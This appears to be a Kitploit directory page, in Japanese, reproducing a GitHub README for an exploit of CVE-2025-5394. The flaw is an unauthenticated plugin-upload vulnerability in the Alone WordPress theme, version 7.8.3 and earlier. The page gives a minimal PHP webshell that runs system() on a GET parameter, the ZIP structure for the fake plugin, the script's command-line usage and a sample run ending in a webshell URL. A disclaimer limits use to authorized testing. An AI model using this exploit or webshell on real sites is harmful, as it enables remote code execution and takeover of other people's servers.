Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-5394 — Alone – チャリティマルチパーパス非営利WordPressテーマ <= 7.8.3 - 認可の欠如による未認証の任意のファイルアップロード(プラグインインストールを介して) | Kitploit
ツール/GitHubGitHub/nxploited/cve-2025-5394
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubnxploited/cve-2025-5394

CVE-2025-5394

Alone – チャリティマルチパーパス非営利WordPressテーマ <= 7.8.3 - 認可の欠如による未認証の任意のファイルアップロード(プラグインインストールを介して)

リポジトリを見る
3151年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🚨 CVE-2025-5394 - Aloneテーマにおける未認証の任意プラグインアップロード

📌 影響を受ける製品:

Alone – チャリティ多目的非営利WordPressテーマ
バージョン: <= 7.8.3
CVE: CVE-2025-5394
CVSSスコア: 9.8 (重要)

🔥 脆弱性概要:

WordPress用Aloneテーマは、alone_import_pack_install_plugin()関数における機能チェックの欠如により、任意のファイルアップロードに対して脆弱です。この欠陥により、未認証の攻撃者がリモートロケーションからZIPファイル(プラグインを装ったもの)をアップロードし、リモートコード実行が可能になる可能性があります。


⚙️ エクスプロイトスクリプト (Python)

このリポジトリには、CVE-2025-5394のエクスプロイトを自動化するPythonスクリプトが含まれています。このスクリプトは脆弱なAJAXアクションをトリガーし、偽のプラグイン(ウェブシェルを含む)をWordPressサーバーに直接アップロードします。


📁 ウェブシェルの要件:

アップロードするZIPファイルは次の構造に従う必要があります:

shell_plugin.zip
└── shell_plugin
    └── shell_plugin.php

ここで:

  • shell_plugin はプラグインディレクトリです。
  • shell_plugin.php はプラグインヘッダーを含む有効なPHPプラグインファイルです。
  • PHPファイルにはウェブシェルペイロードを含めることができます。

shell_plugin.php 内の最小限のプラグインヘッダーの例:

<?php
/*
Plugin Name: Webshell
*/
system($_GET['cmd']);
?>

🚀 使用例:

python3 CVE-2025-5394.py -help
usage: CVE-2025-5394.py [-h] -u URL -s SHELL

CVE-2025-5394 Exploit | by Khaled Alenazi (Nxploited)

options:
  -h, --help         show this help message and exit
  -u, --url URL      Target WordPress site URL
  -s, --shell SHELL  ZIP file URL containing webshell (.zip)

✅ 成功時の出力:

python3 CVE-2025-5394.py -u http://target.com/wordpress/ -s http://target.com/shell_plugin.zip
[>] Target        : http://target.com/wordpress
[>] Shell URL     : http://target.com/shell.php
[>] Plugin Slug   : shell_plugin
[>] Sending exploit...
[+] Exploit successful
[+] Webshell URL  : http://target.com/wordpress/wp-content/plugins/shell_plugin/shell_plugin.php

⚠️ 免責事項:

このスクリプトは教育および研究目的のみで提供されます。作者は、このコードを使用して行われた不適切使用または違法行為について一切の責任を負いません。自分が所有するシステム、またはテストの明示的な許可があるシステムでのみ使用してください。


👨‍💻 作成者:

Nxploited ( Khaled Alenazi )
GitHub: https://github.com/Nxploited

ツールをダウンロード